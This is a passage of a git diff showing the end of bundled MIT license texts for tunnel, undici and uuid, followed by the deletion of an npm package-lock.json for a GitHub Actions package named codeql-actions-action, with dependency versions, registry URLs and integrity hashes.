IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR -IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - - -tunnel -MIT -The MIT License (MIT) - -Copyright (c) 2012 Koichi Kobayashi - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. 
- - -undici -MIT -MIT License - -Copyright (c) Matteo Collina and Undici contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -uuid -MIT -The MIT License (MIT) - -Copyright (c) 2010-2020 Robert Kieffer and other contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
- -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json deleted file mode 100644 index 9cacb7f9af9c..000000000000 --- a/.github/action/package-lock.json +++ /dev/null 
@@ -1,639 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "codeql-actions-action", - "version": "0.1.0", - "license": "MIT", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } - }, - "node_modules/@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "node_modules/@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "dependencies": { - "@actions/io": "^1.0.1" - } - }, - "node_modules/@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "node_modules/@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "dependencies": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "node_modules/@actions/io": { - "version": "1.1.3", - "resolved": 
"https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "node_modules/@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "dependencies": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - } - }, - "node_modules/@actions/tool-cache/node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", - "engines": { - "node": ">=14" - } - }, - "node_modules/@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "dependencies": { - "@octokit/types": "^6.0.3" - } - }, - "node_modules/@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "dependencies": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "dependencies": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/graphql": { - "version": "4.8.0", - "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "dependencies": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - 
"node_modules/@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "node_modules/@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "dependencies": { - "@octokit/types": "^6.40.0" - }, - "peerDependencies": { - "@octokit/core": ">=2" - } - }, - "node_modules/@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "dependencies": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - }, - "peerDependencies": { - "@octokit/core": ">=3" - } - }, - "node_modules/@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "dependencies": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "dependencies": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, 
- "node_modules/@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "dependencies": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "node_modules/@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "dependencies": { - "undici-types": "~5.26.4" - } - }, - "node_modules/@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true, - "bin": { - "ncc": "dist/ncc/cli.js" - } - }, - "node_modules/before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "node_modules/deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "node_modules/is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "dependencies": { - "whatwg-url": "^5.0.0" - }, - "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "node_modules/tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", - "engines": { - "node": ">=0.6.11 <=0.7.0 || >=0.7.3" - } - }, - "node_modules/typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": 
"sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "dependencies": { - "@fastify/busboy": "^2.0.0" - }, - "engines": { - "node": ">=14.0" - } - }, - "node_modules/undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "node_modules/universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "node_modules/uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", - "bin": { - "uuid": "dist/bin/uuid" - } - }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - 
"node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - }, - "dependencies": { - "@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "requires": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "requires": { - "@actions/io": "^1.0.1" - } - }, - "@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "requires": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "requires": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "@actions/io": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": 
"sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "requires": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - } - } - }, - "@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" - }, - "@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "requires": { - "@octokit/types": "^6.0.3" - } - }, - "@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "requires": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "requires": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/graphql": { - "version": "4.8.0", - "resolved": 
"https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "requires": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "requires": { - "@octokit/types": "^6.40.0" - } - }, - "@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "requires": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - } - }, - "@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "requires": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": 
"sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "requires": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, - "@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "requires": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "requires": { - "undici-types": "~5.26.4" - } - }, - "@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true - }, - "before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" - }, - "node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": 
